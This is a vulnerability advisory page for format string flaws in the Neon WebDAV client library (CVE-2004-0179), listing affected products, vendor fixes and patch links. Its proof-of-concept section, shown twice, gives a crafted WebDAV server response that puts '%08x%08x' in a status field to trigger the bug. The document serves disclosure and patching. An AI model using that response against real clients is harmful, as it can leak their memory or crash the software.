Neon WebDAV Client Library Format String Vulnerabilities
BID:10136
Info
Neon WebDAV Client Library Format String Vulnerabilities
| Bugtraq ID: | 10136 |
| Class: | Input Validation Error |
| CVE: |
CVE-2004-0179 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 14 2004 12:00AM |
| Updated: | Jul 12 2009 04:06AM |
| Credit: | Discovery of this issue is credited to Thomas Wana <[email protected]>. |
| Vulnerable: |
sitecopy sitecopy 0.13.4 sitecopy sitecopy 0.13.3 SGI ProPack 2.4 SGI ProPack 2.3 Redhat Linux 9.0 i386 Redhat Linux 7.3 Redhat Fedora Core1 Redhat Enterprise Linux WS 2.1 Redhat Enterprise Linux ES 2.1 Redhat Enterprise Linux AS 2.1 Redhat Advanced Workstation for the Itanium Processor 2.1 OpenOffice OpenOffice 1.1.52 OpenOffice OpenOffice 1.1.51 OpenOffice OpenOffice 1.1.2 OpenOffice OpenOffice 1.1.1 OpenOffice OpenOffice 1.1 .0 OpenOffice OpenOffice 1.0.3 OpenOffice OpenOffice 1.0.1 Netwosix Netwosix Linux 1.1 Netwosix Netwosix Linux 1.0 Neon Client Library 0.24.4 Neon Client Library 0.24.3 Neon Client Library 0.24.2 Neon Client Library 0.24.1 Neon Client Library 0.24 Neon Client Library 0.23.8 Neon Client Library 0.23.7 Neon Client Library 0.23.6 Neon Client Library 0.23.5 Neon Client Library 0.23.4 Neon Client Library 0.23.3 Neon Client Library 0.23.2 Neon Client Library 0.23.1 Neon Client Library 0.23 Neon Client Library 0.19.3 Mandriva Linux Mandrake 10.0 AMD64 Mandriva Linux Mandrake 10.0 Gentoo Linux 1.4 _rc3 Gentoo Linux 1.4 _rc2 Gentoo Linux 1.4 _rc1 Gentoo Linux 1.4 Gentoo Linux 1.2 Gentoo Linux 1.1 a Gentoo Linux 0.7 Gentoo Linux 0.5 Cadaver WebDAV Client 0.22.1 Cadaver WebDAV Client 0.22 Cadaver WebDAV Client 0.21 Cadaver WebDAV Client 0.20.5 Cadaver WebDAV Client 0.20.4 Cadaver WebDAV Client 0.20.3 Cadaver WebDAV Client 0.20.2 Cadaver WebDAV Client 0.20.1 Cadaver WebDAV Client 0.20 ArX Distributed Revision Control System 1.0.18 ArX Distributed Revision Control System 1.0.17 ArX Distributed Revision Control System 1.0 pre16 ArX Distributed Revision Control System 1.0 pre15 ArX Distributed Revision Control System 1.0 pre14 ArX Distributed Revision Control System 1.0 pre13 ArX Distributed Revision Control System 1.0 pre12 ArX Distributed Revision Control System 1.0 pre11 ArX Distributed Revision Control System 1.0 pre10 |
| Not Vulnerable: |
Neon Client Library 0.24.5 ArX Distributed Revision Control System 1.0.19 |
Discussion
Neon WebDAV Client Library Format String Vulnerabilities
It has been reported that the Neon client library is prone to multiple remote format string vulnerabilities. This issue is due to a failure of the application to properly implement format string functions.
Ultimately this vulnerability could allow for execution of arbitrary code on the system implementing the affected client software, which would occur in the security context of the server process.
It has been reported that the Neon client library is prone to multiple remote format string vulnerabilities. This issue is due to a failure of the application to properly implement format string functions.
Ultimately this vulnerability could allow for execution of arbitrary code on the system implementing the affected client software, which would occur in the security context of the server process.
Exploit / POC
Neon WebDAV Client Library Format String Vulnerabilities
It has been reported that the following XML request/response sequence will be sufficient to trigger this issue:
Request
- -------
PROPFIND /example/resource/string/ HTTP/1.1
Pragma: no-cache
Cache-control: no-cache
Accept: text/*, image/jpeg, image/png, image/*, */*
Accept-Encoding: x-gzip, gzip, identity
Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Host: www.example.com
Depth: 0
Response
- --------
HTTP/1.1 207 Multi-Status
X-Cocoon-Version: 2.1
Set-Cookie: JSESSIONID=cookie_data; Path=/example
Content-Type: text/xml
Transfer-Encoding: chunked
<?xml version="1.0" encoding="UTF-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>/lenya/blog/authoring/entries/2003/08/24/peanuts/</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>%08x%08x</D:status>
</D:propstat>
</D:response>
</D:multistatus>
It has been reported that the following XML request/response sequence will be sufficient to trigger this issue:
Request
- -------
PROPFIND /example/resource/string/ HTTP/1.1
Pragma: no-cache
Cache-control: no-cache
Accept: text/*, image/jpeg, image/png, image/*, */*
Accept-Encoding: x-gzip, gzip, identity
Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Host: www.example.com
Depth: 0
Response
- --------
HTTP/1.1 207 Multi-Status
X-Cocoon-Version: 2.1
Set-Cookie: JSESSIONID=cookie_data; Path=/example
Content-Type: text/xml
Transfer-Encoding: chunked
<?xml version="1.0" encoding="UTF-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>/lenya/blog/authoring/entries/2003/08/24/peanuts/</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>%08x%08x</D:status>
</D:propstat>
</D:response>
</D:multistatus>
Solution / Fix
Neon WebDAV Client Library Format String Vulnerabilities
Solution:
The vendor has released an upgrade that deals with this issue.
Gentoo has released an advisory (GLSA 200405-25:02). This advisory announces the release of a new tla eBuild to address the issues reported in this BID. Gentoo have recommended that tla users upgrade to tla current by issuing the following sequence of commands as a superuser:
emerge sync
emerge -pv ">=dev-util/tla-1.2-r2"
emerge ">=dev-util/tla-1.2-r2"
Gentoo have released an advisory (GLSA 200405-01). This advisory announces the release of a new neon eBuild to address the issues reported in this BID. Gentoo have recommended that Neon users upgrade to neon version 0.24.5 or later by issuing the following sequence of commands as a superuser:
emerge sync
emerge -pv ">=net-misc/neon-0.24.5"
emerge ">=net-misc/neon-0.24.5"
SGI has released an advisory 20040404-01-U and fixes to address this issue. Please see referenced advisory for further details regarding obtaining and applying appropriate fixes. Fixes are linked below.
Red Hat has released an advisory (RHSA-2004:157-06) and fixes to address this issue on Red Hat Linux Enterprise platforms. Customers who are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.
Redhat advisory RHSA-2004:158-01 along with fixes has been released dealing with this issue.
SUSE has released an advisory SuSE-SA:2004:009 to address this and other issues. Please see the advisory for more information.
Redhat advisory RHSA-2004:159-01 along with fixes has been released dealing with this issue. This advisory contains updated subversion packages. Please see the referenced advisory for more information.
OpenPKG has released advisory OpenPKG-SA-2004.016 as well as a fix dealing with this issue. Please see the referenced advisory for more information, and below for the updated fix.
Debian has released advisory DSA 487-1 to address this issue. Please see the attached advisory for further details on obtaining and applying fixes.
Gentoo has released updates to address these issues, which may be applied with the following commands:
# emerge sync
# emerge -pv ">=net-misc/cadaver-0.22.1"
# emerge ">=net-misc/cadaver-0.22.1"
Netwosix has released an advisory LNSA-#2004-0012 with fix information to address these issues. Please see the referenced advisory for more information.
Mandrake has released advisory MDKSA-2004:032 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.
Red Hat has released advisory RHSA-2004:163-01 and fixes dealing with this issue for their affected OpenOffice packages for Red Hat Linux 9.0. Please see the attached advisory for more information and details on obtaining fixes.
Gentoo has released an advisory (GLSA 200405-04) for OpenOffice, which uses the neon library. Please see the attached advisory for more information and details on obtaining fixes.
Gentoo openoffice users on the x86 architecture should:
# emerge sync
# emerge -pv ">=app-office/openoffice-1.1.1-r1"
# emerge ">=app-office/openoffice-1.1.1-r1"
Gentoo openoffice users on the sparc architecture should:
# emerge sync
# emerge -pv ">=app-office/openoffice-1.1.0-r3"
# emerge ">=app-office/openoffice-1.1.0-r3"
Gentoo openoffice users on the ppc architecture should:
# emerge sync
# emerge -pv ">=app-office/openoffice-1.0.3-r1"
# emerge ">=app-office/openoffice-1.0.3-r1"
Gentoo openoffice-ximian users should:
# emerge sync
# emerge -pv ">=app-office/openoffice-ximian-1.1.51-r1"
# emerge ">=app-office/openoffice-ximian-1.1.51-r1"
Red Hat Fedora has released advisory FEDORA-2004-103 dealing with these issues for their Fedora Linux project. Please see the referenced advisory for more information.
Gentoo has released an advisory (GLSA 200406-03) providing fixes for sitecopy, which includes the vulnerable neon library. Fixes may be applied by the superuser with the following commands:
emerge -pv unmerge net-misc/sitecopy
emerge unmerge net-misc/sitecopy
Mandrake Linux has released advisory MDKSA-2004:078 addressing this issue. Please see the referenced advisory for further information.
The Fedora Legacy project has released advisory FLSA:1552 along with fixes to address this issue for RedHat Linux 7.3 and 9.0. Please see the referenced advisory for further information.
Redhat Fedora Core1
Neon Client Library 0.19.3
Cadaver WebDAV Client 0.22
Cadaver WebDAV Client 0.22.1
Neon Client Library 0.24
Neon Client Library 0.24.1
Neon Client Library 0.24.2
Neon Client Library 0.24.3
Neon Client Library 0.24.4
ArX Distributed Revision Control System 1.0 pre16
ArX Distributed Revision Control System 1.0 pre11
ArX Distributed Revision Control System 1.0 pre10
ArX Distributed Revision Control System 1.0 pre13
ArX Distributed Revision Control System 1.0 pre15
ArX Distributed Revision Control System 1.0 pre12
ArX Distributed Revision Control System 1.0 pre14
ArX Distributed Revision Control System 1.0.17
ArX Distributed Revision Control System 1.0.18
OpenOffice OpenOffice 1.1.2
SGI ProPack 2.3
SGI ProPack 2.4
Solution:
The vendor has released an upgrade that deals with this issue.
Gentoo has released an advisory (GLSA 200405-25:02). This advisory announces the release of a new tla eBuild to address the issues reported in this BID. Gentoo have recommended that tla users upgrade to tla current by issuing the following sequence of commands as a superuser:
emerge sync
emerge -pv ">=dev-util/tla-1.2-r2"
emerge ">=dev-util/tla-1.2-r2"
Gentoo have released an advisory (GLSA 200405-01). This advisory announces the release of a new neon eBuild to address the issues reported in this BID. Gentoo have recommended that Neon users upgrade to neon version 0.24.5 or later by issuing the following sequence of commands as a superuser:
emerge sync
emerge -pv ">=net-misc/neon-0.24.5"
emerge ">=net-misc/neon-0.24.5"
SGI has released an advisory 20040404-01-U and fixes to address this issue. Please see referenced advisory for further details regarding obtaining and applying appropriate fixes. Fixes are linked below.
Red Hat has released an advisory (RHSA-2004:157-06) and fixes to address this issue on Red Hat Linux Enterprise platforms. Customers who are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.
Redhat advisory RHSA-2004:158-01 along with fixes has been released dealing with this issue.
SUSE has released an advisory SuSE-SA:2004:009 to address this and other issues. Please see the advisory for more information.
Redhat advisory RHSA-2004:159-01 along with fixes has been released dealing with this issue. This advisory contains updated subversion packages. Please see the referenced advisory for more information.
OpenPKG has released advisory OpenPKG-SA-2004.016 as well as a fix dealing with this issue. Please see the referenced advisory for more information, and below for the updated fix.
Debian has released advisory DSA 487-1 to address this issue. Please see the attached advisory for further details on obtaining and applying fixes.
Gentoo has released updates to address these issues, which may be applied with the following commands:
# emerge sync
# emerge -pv ">=net-misc/cadaver-0.22.1"
# emerge ">=net-misc/cadaver-0.22.1"
Netwosix has released an advisory LNSA-#2004-0012 with fix information to address these issues. Please see the referenced advisory for more information.
Mandrake has released advisory MDKSA-2004:032 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.
Red Hat has released advisory RHSA-2004:163-01 and fixes dealing with this issue for their affected OpenOffice packages for Red Hat Linux 9.0. Please see the attached advisory for more information and details on obtaining fixes.
Gentoo has released an advisory (GLSA 200405-04) for OpenOffice, which uses the neon library. Please see the attached advisory for more information and details on obtaining fixes.
Gentoo openoffice users on the x86 architecture should:
# emerge sync
# emerge -pv ">=app-office/openoffice-1.1.1-r1"
# emerge ">=app-office/openoffice-1.1.1-r1"
Gentoo openoffice users on the sparc architecture should:
# emerge sync
# emerge -pv ">=app-office/openoffice-1.1.0-r3"
# emerge ">=app-office/openoffice-1.1.0-r3"
Gentoo openoffice users on the ppc architecture should:
# emerge sync
# emerge -pv ">=app-office/openoffice-1.0.3-r1"
# emerge ">=app-office/openoffice-1.0.3-r1"
Gentoo openoffice-ximian users should:
# emerge sync
# emerge -pv ">=app-office/openoffice-ximian-1.1.51-r1"
# emerge ">=app-office/openoffice-ximian-1.1.51-r1"
Red Hat Fedora has released advisory FEDORA-2004-103 dealing with these issues for their Fedora Linux project. Please see the referenced advisory for more information.
Gentoo has released an advisory (GLSA 200406-03) providing fixes for sitecopy, which includes the vulnerable neon library. Fixes may be applied by the superuser with the following commands:
emerge -pv unmerge net-misc/sitecopy
emerge unmerge net-misc/sitecopy
Mandrake Linux has released advisory MDKSA-2004:078 addressing this issue. Please see the referenced advisory for further information.
The Fedora Legacy project has released advisory FLSA:1552 along with fixes to address this issue for RedHat Linux 7.3 and 9.0. Please see the referenced advisory for further information.
Redhat Fedora Core1
-
Fedora neon-0.24.5-1.i386.rpm
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/i386 /neon-0.24.5-1.i386.rpm -
Fedora neon-0.24.5-1.x86_64.rpm
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/x86_ 64/neon-0.24.5-1.x86_64.rpm -
Fedora neon-debuginfo-0.24.5-1.i386.rpm
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/i386 /debug/neon-debuginfo-0.24.5-1.i386.rpm -
Fedora neon-debuginfo-0.24.5-1.x86_64.rpm
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/x86_ 64/debug/neon-debuginfo-0.24.5-1.x86_64.rpm -
Fedora neon-devel-0.24.5-1.i386.rpm
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/i386 /neon-devel-0.24.5-1.i386.rpm -
Fedora neon-devel-0.24.5-1.x86_64.rpm
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/x86_ 64/neon-devel-0.24.5-1.x86_64.rpm
Neon Client Library 0.19.3
-
Debian libneon-dev_0.19.3-2woody3_alpha.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon-dev_0.19.3 -2woody3_alpha.deb -
Debian libneon-dev_0.19.3-2woody3_arm.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon-dev_0.19.3 -2woody3_arm.deb -
Debian libneon-dev_0.19.3-2woody3_hppa.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon-dev_0.19.3 -2woody3_hppa.deb -
Debian libneon-dev_0.19.3-2woody3_i386.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon-dev_0.19.3 -2woody3_i386.deb -
Debian libneon-dev_0.19.3-2woody3_ia64.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon-dev_0.19.3 -2woody3_ia64.deb -
Debian libneon-dev_0.19.3-2woody3_m68k.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon-dev_0.19.3 -2woody3_m68k.deb -
Debian libneon-dev_0.19.3-2woody3_mips.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon-dev_0.19.3 -2woody3_mips.deb -
Debian libneon-dev_0.19.3-2woody3_mipsel.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon-dev_0.19.3 -2woody3_mipsel.deb -
Debian libneon-dev_0.19.3-2woody3_powerpc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon-dev_0.19.3 -2woody3_powerpc.deb -
Debian libneon-dev_0.19.3-2woody3_s390.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon-dev_0.19.3 -2woody3_s390.deb -
Debian libneon-dev_0.19.3-2woody3_sparc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon-dev_0.19.3 -2woody3_sparc.deb -
Debian libneon19_0.19.3-2woody3_alpha.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon19_0.19.3-2 woody3_alpha.deb -
Debian libneon19_0.19.3-2woody3_arm.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon19_0.19.3-2 woody3_arm.deb -
Debian libneon19_0.19.3-2woody3_hppa.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon19_0.19.3-2 woody3_hppa.deb -
Debian libneon19_0.19.3-2woody3_i386.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon19_0.19.3-2 woody3_i386.deb -
Debian libneon19_0.19.3-2woody3_ia64.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon19_0.19.3-2 woody3_ia64.deb -
Debian libneon19_0.19.3-2woody3_m68k.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon19_0.19.3-2 woody3_m68k.deb -
Debian libneon19_0.19.3-2woody3_mips.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon19_0.19.3-2 woody3_mips.deb -
Debian libneon19_0.19.3-2woody3_mipsel.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon19_0.19.3-2 woody3_mipsel.deb -
Debian libneon19_0.19.3-2woody3_powerpc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon19_0.19.3-2 woody3_powerpc.deb -
Debian libneon19_0.19.3-2woody3_s390.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon19_0.19.3-2 woody3_s390.deb -
Debian libneon19_0.19.3-2woody3_sparc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/n/neon/libneon19_0.19.3-2 woody3_sparc.deb
Cadaver WebDAV Client 0.22
-
Red Hat cadaver-0.22.0-2.2.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/cadaver-0.22.0-2.2.i386.rpm
Cadaver WebDAV Client 0.22.1
-
RedHat cadaver-0.22.1-1.legacy.i386.rpm
Red Hat Linux 7.3
http://download.fedoralegacy.org/redhat/7.3/updates/i386/cadaver-0.22. 1-1.legacy.i386.rpm -
RedHat cadaver-0.22.1-3.legacy.i386.rpm
Red Hat Linux 9
http://download.fedoralegacy.org/redhat/9/updates/i386/cadaver-0.22.1- 3.legacy.i386.rpm
Neon Client Library 0.24
-
Neon neon-0.24.5.tar.gz
http://www.webdav.org/neon/neon-0.24.5.tar.gz
Neon Client Library 0.24.1
-
Neon neon-0.24.5.tar.gz
http://www.webdav.org/neon/neon-0.24.5.tar.gz
Neon Client Library 0.24.2
-
Neon neon-0.24.5.tar.gz
http://www.webdav.org/neon/neon-0.24.5.tar.gz
Neon Client Library 0.24.3
-
Neon neon-0.24.5.tar.gz
http://www.webdav.org/neon/neon-0.24.5.tar.gz
Neon Client Library 0.24.4
-
Neon neon-0.24.5.tar.gz
http://www.webdav.org/neon/neon-0.24.5.tar.gz -
OpenPKG neon-0.24.4-2.0.1.src.rpm
ftp.openpkg.org/release/2.0/UPD/neon-0.24.4-2.0.1.src.rpm
ArX Distributed Revision Control System 1.0 pre16
-
ArX ArX-1.0.19.tar.gz
http://superbeast.ucsd.edu/~landry/ArX/ArX-1.0.19.tar.gz
ArX Distributed Revision Control System 1.0 pre11
-
ArX ArX-1.0.19.tar.gz
http://superbeast.ucsd.edu/~landry/ArX/ArX-1.0.19.tar.gz
ArX Distributed Revision Control System 1.0 pre10
-
ArX ArX-1.0.19.tar.gz
http://superbeast.ucsd.edu/~landry/ArX/ArX-1.0.19.tar.gz
ArX Distributed Revision Control System 1.0 pre13
-
ArX ArX-1.0.19.tar.gz
http://superbeast.ucsd.edu/~landry/ArX/ArX-1.0.19.tar.gz
ArX Distributed Revision Control System 1.0 pre15
-
ArX ArX-1.0.19.tar.gz
http://superbeast.ucsd.edu/~landry/ArX/ArX-1.0.19.tar.gz
ArX Distributed Revision Control System 1.0 pre12
-
ArX ArX-1.0.19.tar.gz
http://superbeast.ucsd.edu/~landry/ArX/ArX-1.0.19.tar.gz
ArX Distributed Revision Control System 1.0 pre14
-
ArX ArX-1.0.19.tar.gz
http://superbeast.ucsd.edu/~landry/ArX/ArX-1.0.19.tar.gz
ArX Distributed Revision Control System 1.0.17
-
ArX ArX-1.0.19.tar.gz
http://superbeast.ucsd.edu/~landry/ArX/ArX-1.0.19.tar.gz
ArX Distributed Revision Control System 1.0.18
-
ArX ArX-1.0.19.tar.gz
http://superbeast.ucsd.edu/~landry/ArX/ArX-1.0.19.tar.gz
OpenOffice OpenOffice 1.1.2
-
Mandrake OpenOffice.org-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-cs-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-cs-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-de-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-de-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-en-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-en-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-es-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-es-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-eu-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-eu-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-fi-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-fi-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-fr-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-fr-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-it-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-it-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-ja-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-ja-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-ko-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-ko-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-nl-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-nl-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-ru-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-ru-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-sk-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-sk-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-sv-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-sv-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-zh_CN-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-zh_CN-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-zh_TW-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-help-zh_TW-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-ar-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-ar-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-ca-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-ca-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-cs-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-cs-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-da-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-da-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-de-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-de-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-el-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-el-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-en-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-en-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-es-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-es-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-et-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-et-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-eu-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-eu-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-fi-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-fi-1.1.2-3.1.100mdk.i586.rpm
